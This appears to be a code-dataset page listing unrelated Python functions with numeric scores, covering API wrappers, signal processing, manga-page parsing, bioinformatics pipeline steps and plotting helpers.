:type column: orator.dbal.Column
:param schema: The schema
:type schema: orator.dbal.SchemaManager
:rtype: orator.dbal.TableDiff
"""
table_diff = self._get_table_diff(blueprint, schema)
return self._set_renamed_columns(table_diff, command, column) | 0.003221 |
def target_base(self):
"""
:API: public
:returns: the source root path for this target.
"""
source_root = self._sources_field.source_root
if not source_root:
raise TargetDefinitionException(self, 'Not under any configured source root.')
return source_root.path | 0.010169 |
async def resetTriggerToken(self, *args, **kwargs):
"""
Reset a trigger token
Reset the token for triggering a given hook. This invalidates token that
may have been issued via getTriggerToken with a new token.
This method gives output: ``v1/trigger-token-response.json#``
This method is ``stable``
"""
return await self._makeApiCall(self.funcinfo["resetTriggerToken"], *args, **kwargs) | 0.00883 |
def get_clan_war(self, tag: crtag, timeout: int=None):
"""Get inforamtion about a clan's current clan war
Parameters
----------
tag: str
A valid tournament tag. Minimum length: 3
Valid characters: 0289PYLQGRJCUV
timeout: Optional[int] = None
Custom timeout that overwrites Client.timeout
"""
url = self.api.CLAN + '/' + tag + '/currentwar'
return self._get_model(url, timeout=timeout) | 0.008247 |
def address(self):
'''
Return the address of this "object", minus the scheme, hostname
and port of the bridge
'''
return self.API.replace(
'http://{}:{}'.format(
self._bridge.hostname,
self._bridge.port
), ''
) | 0.006369 |
def spec_var(model, ph):
"""Compute variance of ``p`` from Fourier coefficients ``ph``.
Parameters
----------
model : pyqg.Model instance
The model object from which `ph` originates
ph : complex array
The field on which to compute the variance
Returns
-------
var_dens : float
The variance of `ph`
"""
var_dens = 2. * np.abs(ph)**2 / model.M**2
# only half of coefs [0] and [nx/2+1] due to symmetry in real fft2
var_dens[...,0] /= 2
var_dens[...,-1] /= 2
return var_dens.sum(axis=(-1,-2)) | 0.007005 |
def safe_import(self, name):
"""Helper utility for reimporting previously imported modules while inside the env"""
module = None
if name not in self._modules:
self._modules[name] = importlib.import_module(name)
module = self._modules[name]
if not module:
dist = next(iter(
dist for dist in self.base_working_set if dist.project_name == name
), None)
if dist:
dist.activate()
module = importlib.import_module(name)
if name in sys.modules:
try:
six.moves.reload_module(module)
six.moves.reload_module(sys.modules[name])
except TypeError:
del sys.modules[name]
sys.modules[name] = self._modules[name]
return module | 0.004723 |
def _coeff4(N, a0, a1, a2, a3):
"""a common internal function to some window functions with 4 coeffs
For the blackmna harris for instance, the results are identical to octave if N is odd
but not for even values...if n =0 whatever N is, the w(0) must be equal to a0-a1+a2-a3, which
is the case here, but not in octave..."""
if N == 1:
return ones(1)
n = arange(0, N)
N1 = N - 1.
w = a0 -a1*cos(2.*pi*n / N1) + a2*cos(4.*pi*n / N1) - a3*cos(6.*pi*n / N1)
return w | 0.007843 |
def _external2internal_func(bounds):
"""
Make a function which converts between external (constrained) and
internal (unconstrained) parameters.
"""
ls = [_external2internal_lambda(b) for b in bounds]
def convert_e2i(xe):
xi = empty_like(xe)
xi[:] = [l(p) for l, p in zip(ls, xe)]
return xi
return convert_e2i | 0.005525 |
def is_chief(task: backend.Task, run_name: str):
"""Returns True if task is chief task in the corresponding run"""
global run_task_dict
if run_name not in run_task_dict:
return True
task_list = run_task_dict[run_name]
assert task in task_list, f"Task {task.name} doesn't belong to run {run_name}"
return task_list[0] == task | 0.023529 |
def durables(self):
"""
Dictionary of all keys and their values in Zookeeper.
"""
results = dict()
for child in self.connection.retry(self.connection.get_children, self.keyspace):
value, _ = self.connection.retry(
self.connection.get,
self.__path_of(child),
watch=self.__increment_last_updated
)
results[child] = self.encoding.decode(value)
return results | 0.006135 |
def update_stored_win32tz_map():
"""Downloads the cldr win32 timezone map and stores it in win32tz_map.py."""
windows_zones_xml = download_cldr_win32tz_map_xml()
source_hash = hashlib.md5(windows_zones_xml).hexdigest()
if hasattr(windows_zones_xml, "decode"):
windows_zones_xml = windows_zones_xml.decode("utf-8")
map_zones = create_win32tz_map(windows_zones_xml)
map_dir = os.path.dirname(os.path.abspath(__file__))
map_filename = os.path.join(map_dir, "win32tz_map.py")
if os.path.exists(map_filename):
reload(win32tz_map)
current_hash = getattr(win32tz_map, "source_hash", None)
if current_hash == source_hash:
return False
map_file = open(map_filename, "w")
comment = "Map between Windows and Olson timezones taken from %s" % (
_CLDR_WINZONES_URL,)
comment2 = "Generated automatically from datetime_tz.py"
map_file.write("'''%s\n" % comment)
map_file.write("%s'''\n" % comment2)
map_file.write("source_hash = '%s' # md5 sum of xml source data\n" % (
source_hash))
map_file.write("win32timezones = {\n")
for win32_name, territory, olson_name, comment in map_zones:
if territory == '001':
map_file.write(" %r: %r, # %s\n" % (
str(win32_name), str(olson_name), comment or ""))
else:
map_file.write(" %r: %r, # %s\n" % (
(str(win32_name), str(territory)), str(olson_name), comment or ""))
map_file.write("}\n")
map_file.close()
return True | 0.015753 |
def generate_lines_for_vocab(tmp_dir, sources, file_byte_budget=1e6):
"""Generate lines for vocabulary generation."""
tf.logging.info("Generating vocab from: %s", str(sources))
for source in sources:
url = source[0]
filename = os.path.basename(url)
compressed_file = maybe_download(tmp_dir, filename, url)
for lang_file in source[1]:
tf.logging.info("Reading file: %s" % lang_file)
filepath = os.path.join(tmp_dir, lang_file)
# Extract from tar if needed.
if not tf.gfile.Exists(filepath):
read_type = "r:gz" if filename.endswith("tgz") else "r"
with tarfile.open(compressed_file, read_type) as corpus_tar:
corpus_tar.extractall(tmp_dir)
# For some datasets a second extraction is necessary.
if lang_file.endswith(".gz"):
new_filepath = os.path.join(tmp_dir, lang_file[:-3])
if tf.gfile.Exists(new_filepath):
tf.logging.info(
"Subdirectory %s already exists, skipping unpacking" % filepath)
else:
tf.logging.info("Unpacking subdirectory %s" % filepath)
gunzip_file(filepath, new_filepath)
filepath = new_filepath
with tf.gfile.GFile(filepath, mode="r") as source_file:
file_byte_budget_ = file_byte_budget
counter = 0
countermax = int(source_file.size() / file_byte_budget_ / 2)
for line in source_file:
if counter < countermax:
counter += 1
else:
if file_byte_budget_ <= 0:
break
line = line.strip()
file_byte_budget_ -= len(line)
counter = 0
yield line | 0.01083 |
def get_memberships_for_org(self, account_num, verbose=False):
"""
Retrieve all memberships associated with an organization,
ordered by expiration date.
"""
if not self.client.session_id:
self.client.request_session()
query = "SELECT Objects() FROM Membership " \
"WHERE Owner = '%s' ORDER BY ExpirationDate" % account_num
membership_list = self.get_long_query(query, verbose=verbose)
return membership_list or [] | 0.003945 |
def fmt_sz(intval):
""" Format a byte sized value.
"""
try:
return fmt.human_size(intval)
except (ValueError, TypeError):
return "N/A".rjust(len(fmt.human_size(0))) | 0.005102 |
def hash_id(self):
"""获取作者的内部hash id(用不到就忽视吧~)
:return: 用户hash id
:rtype: str
"""
div = self.soup.find('div', class_='zm-profile-header-op-btns')
if div is not None:
return div.button['data-id']
else:
ga = self.soup.find('script', attrs={'data-name': 'ga_vars'})
return json.loads(ga.text)['user_hash'] | 0.005063 |
def guess_initc(ts, f, rts=[]):
"""
ts - An AstonSeries that's being fitted with peaks
f - The functional form of the peaks (e.g. gaussian)
rts - peak maxima to fit; each number corresponds to one peak
"""
def find_side(y, loc=None):
if loc is None:
loc = y.argmax()
ddy = np.diff(np.diff(y))
lft_loc, rgt_loc = loc - 2, loc + 1
while rgt_loc >= 0 and rgt_loc < len(ddy):
if ddy[rgt_loc] < ddy[rgt_loc - 1]:
break
rgt_loc += 1
while lft_loc >= 0 and lft_loc < len(ddy):
if ddy[lft_loc] < ddy[lft_loc + 1]:
break
lft_loc -= 1
return lft_loc + 1, rgt_loc + 1
# weight_mom = lambda m, a, w: \
# np.sum(w * (a - np.sum(w * a) / np.sum(w)) ** m) / np.sum(w)
# sig = np.sqrt(weight_mom(2, ts.index, ts.values)) # sigma
# peak_params['s'] = weight_mom(3, ts.index, ts.values) / sig ** 3
# peak_params['e'] = weight_mom(4, ts.index, ts.values) / sig ** 4 - 3
# TODO: better method of calculation of these?
all_params = []
for rt in rts:
peak_params = {'x': rt} # ts.index[ts.values.argmax()]
top_idx = np.abs(ts.index - rt).argmin()
side_idx = find_side(ts.values, top_idx)
peak_params['h'] = ts.values[top_idx]
# - min(ts.y[side_idx[0]], ts.y[side_idx[1]])
peak_params['w'] = ts.index[side_idx[1]] - ts.index[side_idx[0]]
peak_params['s'] = 1.1
peak_params['e'] = 1.
peak_params['a'] = 1.
all_params.append(peak_params)
return all_params | 0.000619 |
def remove_instance(self, instance):
"""Request to cleanly remove the given instance.
If instance is external also shutdown it cleanly
:param instance: instance to remove
:type instance: object
:return: None
"""
# External instances need to be close before (process + queues)
if instance.is_external:
logger.info("Request external process to stop for %s", instance.name)
instance.stop_process()
logger.info("External process stopped.")
instance.clear_queues(self.daemon.sync_manager)
# Then do not listen anymore about it
self.instances.remove(instance) | 0.004412 |
def list(self, link_type, product, identifierType=None):
"""
Retrieve list of linked products
:param link_type: type of link, one of 'cross_sell', 'up_sell',
'related' or 'grouped'
:param product: ID or SKU of product
:param identifierType: Defines whether the product or SKU value is
passed in the "product" parameter.
:return: `list` of `dict`
"""
return self.call('catalog_product_link.list',
[link_type, product, identifierType]) | 0.003503 |
def parse_sidebar(self, manga_page):
"""Parses the DOM and returns manga attributes in the sidebar.
:type manga_page: :class:`bs4.BeautifulSoup`
:param manga_page: MAL manga page's DOM
:rtype: dict
:return: manga attributes
:raises: :class:`.InvalidMangaError`, :class:`.MalformedMangaPageError`
"""
# if MAL says the series doesn't exist, raise an InvalidMangaError.
error_tag = manga_page.find(u'div', {'class': 'badresult'})
if error_tag:
raise InvalidMangaError(self.id)
try:
title_tag = manga_page.find(u'div', {'id': 'contentWrapper'}).find(u'h1')
if not title_tag.find(u'div'):
# otherwise, raise a MalformedMangaPageError.
raise MalformedMangaPageError(self.id, manga_page, message="Could not find title div")
except:
if not self.session.suppress_parse_exceptions:
raise
# otherwise, begin parsing.
manga_info = super(Manga, self).parse_sidebar(manga_page)
info_panel_first = manga_page.find(u'div', {'id': 'content'}).find(u'table').find(u'td')
try:
volumes_tag = info_panel_first.find(text=u'Volumes:').parent.parent
utilities.extract_tags(volumes_tag.find_all(u'span', {'class': 'dark_text'}))
manga_info[u'volumes'] = int(volumes_tag.text.strip()) if volumes_tag.text.strip() != 'Unknown' else None
except:
if not self.session.suppress_parse_exceptions:
raise
try:
chapters_tag = info_panel_first.find(text=u'Chapters:').parent.parent
utilities.extract_tags(chapters_tag.find_all(u'span', {'class': 'dark_text'}))
manga_info[u'chapters'] = int(chapters_tag.text.strip()) if chapters_tag.text.strip() != 'Unknown' else None
except:
if not self.session.suppress_parse_exceptions:
raise
try:
published_tag = info_panel_first.find(text=u'Published:').parent.parent
utilities.extract_tags(published_tag.find_all(u'span', {'class': 'dark_text'}))
published_parts = published_tag.text.strip().split(u' to ')
if len(published_parts) == 1:
# this published once.
try:
published_date = utilities.parse_profile_date(published_parts[0])
except ValueError:
raise MalformedMangaPageError(self.id, published_parts[0], message="Could not parse single publish date")
manga_info[u'published'] = (published_date,)
else:
# two publishing dates.
try:
publish_start = utilities.parse_profile_date(published_parts[0])
except ValueError:
raise MalformedMangaPageError(self.id, published_parts[0], message="Could not parse first of two publish dates")
if published_parts == u'?':
# this is still publishing.
publish_end = None
else:
try:
publish_end = utilities.parse_profile_date(published_parts[1])
except ValueError:
raise MalformedMangaPageError(self.id, published_parts[1], message="Could not parse second of two publish dates")
manga_info[u'published'] = (publish_start, publish_end)
except:
if not self.session.suppress_parse_exceptions:
raise
try:
authors_tag = info_panel_first.find(text=u'Authors:').parent.parent
utilities.extract_tags(authors_tag.find_all(u'span', {'class': 'dark_text'}))
manga_info[u'authors'] = {}
for author_link in authors_tag.find_all('a'):
link_parts = author_link.get('href').split('/')
# of the form /people/1867/Naoki_Urasawa
person = self.session.person(int(link_parts[2])).set({'name': author_link.text})
role = author_link.nextSibling.replace(' (', '').replace(')', '')
manga_info[u'authors'][person] = role
except:
if not self.session.suppress_parse_exceptions:
raise
try:
serialization_tag = info_panel_first.find(text=u'Serialization:').parent.parent
publication_link = serialization_tag.find('a')
manga_info[u'serialization'] = None
if publication_link:
link_parts = publication_link.get('href').split('mid=')
# of the form /manga.php?mid=1
manga_info[u'serialization'] = self.session.publication(int(link_parts[1])).set({'name': publication_link.text})
except:
if not self.session.suppress_parse_exceptions:
raise
return manga_info | 0.012835 |
def _set_static_network(self, v, load=False):
"""
Setter method for static_network, mapped from YANG variable /rbridge_id/router/router_bgp/address_family/ipv4/ipv4_unicast/default_vrf/static_network (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_static_network is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_static_network() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("static_network_address",static_network.static_network, yang_name="static-network", rest_name="static-network", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='static-network-address', extensions={u'tailf-common': {u'info': u'Special network that do not depends on IGP and always treat as best route in BGP', u'cli-no-key-completion': None, u'cli-suppress-mode': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'AfStaticNetwork'}}), is_container='list', yang_name="static-network", rest_name="static-network", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Special network that do not depends on IGP and always treat as best route in BGP', u'cli-no-key-completion': None, u'cli-suppress-mode': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'AfStaticNetwork'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='list', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """static_network must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("static_network_address",static_network.static_network, yang_name="static-network", rest_name="static-network", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='static-network-address', extensions={u'tailf-common': {u'info': u'Special network that do not depends on IGP and always treat as best route in BGP', u'cli-no-key-completion': None, u'cli-suppress-mode': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'AfStaticNetwork'}}), is_container='list', yang_name="static-network", rest_name="static-network", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Special network that do not depends on IGP and always treat as best route in BGP', u'cli-no-key-completion': None, u'cli-suppress-mode': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'AfStaticNetwork'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='list', is_config=True)""",
})
self.__static_network = t
if hasattr(self, '_set'):
self._set() | 0.003532 |
def update_pr_main():
"""Main method"""
parser = argparse.ArgumentParser(
description='Build package.',
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('--pr-number', '-p',
dest='pr_number', type=int, required=True,
help='PR number')
parser.add_argument('--repo', '-r',
dest='repo_id', default="Azure/azure-sdk-for-python",
help='Repo id. [default: %(default)s]')
parser.add_argument("-v", "--verbose",
dest="verbose", action="store_true",
help="Verbosity in INFO mode")
parser.add_argument("--debug",
dest="debug", action="store_true",
help="Verbosity in DEBUG mode")
args = parser.parse_args()
main_logger = logging.getLogger()
if args.verbose or args.debug:
logging.basicConfig()
main_logger.setLevel(logging.DEBUG if args.debug else logging.INFO)
update_pr(
os.environ.get("GH_TOKEN", None),
args.repo_id,
int(args.pr_number),
) | 0.000873 |
def hierarchy(intervals_hier, labels_hier, levels=None, ax=None, **kwargs):
'''Plot a hierarchical segmentation
Parameters
----------
intervals_hier : list of np.ndarray
A list of segmentation intervals. Each element should be
an n-by-2 array of segment intervals, in the format returned by
:func:`mir_eval.io.load_intervals` or
:func:`mir_eval.io.load_labeled_intervals`.
Segmentations should be ordered by increasing specificity.
labels_hier : list of list-like
A list of segmentation labels. Each element should
be a list of labels for the corresponding element in
`intervals_hier`.
levels : list of string
Each element ``levels[i]`` is a label for the ```i`` th segmentation.
This is used in the legend to denote the levels in a segment hierarchy.
kwargs
Additional keyword arguments to `labeled_intervals`.
Returns
-------
ax : matplotlib.pyplot.axes._subplots.AxesSubplot
A handle to the (possibly constructed) plot axes
'''
# This will break if a segment label exists in multiple levels
if levels is None:
levels = list(range(len(intervals_hier)))
# Get the axes handle
ax, _ = __get_axes(ax=ax)
# Count the pre-existing patches
n_patches = len(ax.patches)
for ints, labs, key in zip(intervals_hier[::-1],
labels_hier[::-1],
levels[::-1]):
labeled_intervals(ints, labs, label=key, ax=ax, **kwargs)
# Reverse the patch ordering for anything we've added.
# This way, intervals are listed in the legend from top to bottom
ax.patches[n_patches:] = ax.patches[n_patches:][::-1]
return ax | 0.000567 |
def run_somaticsniper_full(job, tumor_bam, normal_bam, univ_options, somaticsniper_options):
"""
Run SomaticSniper on the DNA bams.
:param dict tumor_bam: Dict of bam and bai for tumor DNA-Seq
:param dict normal_bam: Dict of bam and bai for normal DNA-Seq
:param dict univ_options: Dict of universal options used by almost all tools
:param dict somaticsniper_options: Options specific to SomaticSniper
:return: fsID to the genome-level vcf
:rtype: toil.fileStore.FileID
"""
work_dir = os.getcwd()
input_files = {
'tumor.bam': tumor_bam['tumor_dna_fix_pg_sorted.bam'],
'tumor.bam.bai': tumor_bam['tumor_dna_fix_pg_sorted.bam.bai'],
'normal.bam': normal_bam['normal_dna_fix_pg_sorted.bam'],
'normal.bam.bai': normal_bam['normal_dna_fix_pg_sorted.bam.bai'],
'genome.fa.tar.gz': somaticsniper_options['genome_fasta'],
'genome.fa.fai.tar.gz': somaticsniper_options['genome_fai']}
input_files = get_files_from_filestore(job, input_files, work_dir, docker=False)
for key in ('genome.fa', 'genome.fa.fai'):
input_files[key] = untargz(input_files[key + '.tar.gz'], work_dir)
input_files = {key: docker_path(path) for key, path in input_files.items()}
output_file = os.path.join(work_dir, 'somatic-sniper_full.vcf')
parameters = ['-f', input_files['genome.fa'],
'-F', 'vcf',
'-G',
'-L',
'-q', '1',
'-Q', '15',
input_files['tumor.bam'],
input_files['normal.bam'],
docker_path(output_file)]
docker_call(tool='somaticsniper', tool_parameters=parameters, work_dir=work_dir,
dockerhub=univ_options['dockerhub'], tool_version=somaticsniper_options['version'])
outfile = job.fileStore.writeGlobalFile(output_file)
job.fileStore.logToMaster('Ran SomaticSniper on %s successfully' % univ_options['patient'])
return outfile | 0.003497 |
def post(self, url, data, headers=None):
"""
Perform an HTTP POST request for a given url.
Returns the response object.
"""
return self._request('POST', url, data, headers=headers) | 0.009091 |
def line_spacing(self):
"""
|float| or |Length| value specifying the space between baselines in
successive lines of the paragraph. A value of |None| indicates line
spacing is inherited from the style hierarchy. A float value, e.g.
``2.0`` or ``1.75``, indicates spacing is applied in multiples of
line heights. A |Length| value such as ``Pt(12)`` indicates spacing
is a fixed height. The |Pt| value class is a convenient way to apply
line spacing in units of points. Assigning |None| resets line spacing
to inherit from the style hierarchy.
"""
pPr = self._element.pPr
if pPr is None:
return None
return self._line_spacing(pPr.spacing_line, pPr.spacing_lineRule) | 0.002571 |
def random_stochastic_matrix(n, k=None, sparse=False, format='csr',
random_state=None):
"""
Return a randomly sampled n x n stochastic matrix with k nonzero
entries for each row.
Parameters
----------
n : scalar(int)
Number of states.
k : scalar(int), optional(default=None)
Number of nonzero entries in each row of the matrix. Set to n if
not specified.
sparse : bool, optional(default=False)
Whether to generate the matrix in sparse matrix form.
format : str, optional(default='csr')
Sparse matrix format, str in {'bsr', 'csr', 'csc', 'coo', 'lil',
'dia', 'dok'}. Relevant only when sparse=True.
random_state : int or np.random.RandomState, optional
Random seed (integer) or np.random.RandomState instance to set
the initial state of the random number generator for
reproducibility. If None, a randomly initialized RandomState is
used.
Returns
-------
P : numpy ndarray or scipy sparse matrix (float, ndim=2)
Stochastic matrix.
See also
--------
random_markov_chain : Return a random MarkovChain instance.
"""
P = _random_stochastic_matrix(m=n, n=n, k=k, sparse=sparse, format=format,
random_state=random_state)
return P | 0.000737 |
def _plot(self, xticks=[], yticks=[], minor_xticks=[], minor_yticks=[],
xlabel='Longitude', ylabel='Latitude', ax=None, ax2=None,
colorbar=None, cb_orientation=None, cb_label=None, grid=False,
axes_labelsize=None, tick_labelsize=None, **kwargs):
"""Plot the raw data using a simply cylindrical projection."""
if ax is None:
if colorbar is True:
if cb_orientation == 'horizontal':
scale = 0.67
else:
scale = 0.5
else:
scale = 0.55
figsize = (_mpl.rcParams['figure.figsize'][0],
_mpl.rcParams['figure.figsize'][0] * scale)
fig, axes = _plt.subplots(1, 1, figsize=figsize)
else:
axes = ax
deg = '$^{\circ}$'
xticklabels = [str(int(y)) + deg for y in xticks]
yticklabels = [str(int(y)) + deg for y in yticks]
cim = axes.imshow(self.data, origin='upper',
extent=(0., 360., -90., 90.), **kwargs)
axes.set(xticks=xticks, yticks=yticks)
axes.set_xlabel(xlabel, fontsize=axes_labelsize)
axes.set_ylabel(ylabel, fontsize=axes_labelsize)
axes.set_xticklabels(xticklabels, fontsize=tick_labelsize)
axes.set_yticklabels(yticklabels, fontsize=tick_labelsize)
axes.set_xticks(minor_xticks, minor=True)
axes.set_yticks(minor_yticks, minor=True)
axes.grid(grid, which='major')
if colorbar is True:
if cb_orientation == 'vertical':
divider = _make_axes_locatable(axes)
cax = divider.append_axes("right", size="2.5%", pad=0.15)
cbar = _plt.colorbar(cim, cax=cax, orientation=cb_orientation)
else:
divider = _make_axes_locatable(axes)
cax = divider.append_axes("bottom", size="5%", pad=0.5)
cbar = _plt.colorbar(cim, cax=cax,
orientation=cb_orientation)
if cb_label is not None:
cbar.set_label(cb_label, fontsize=axes_labelsize)
cbar.ax.tick_params(labelsize=tick_labelsize)
if ax is None:
return fig, axes | 0.002637 |
def set_elements_text(parent_to_parse, element_path=None, text_values=None):
"""
Assigns an array of text values to each of the elements parsed from the parent. The
text values are assigned in the same order they are provided.
If there are less values then elements, the remaining elements are skipped; but if
there are more, new elements will be inserted for each with the remaining text values.
"""
if text_values is None:
text_values = []
return _set_elements_property(parent_to_parse, element_path, _ELEM_TEXT, text_values) | 0.008787 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.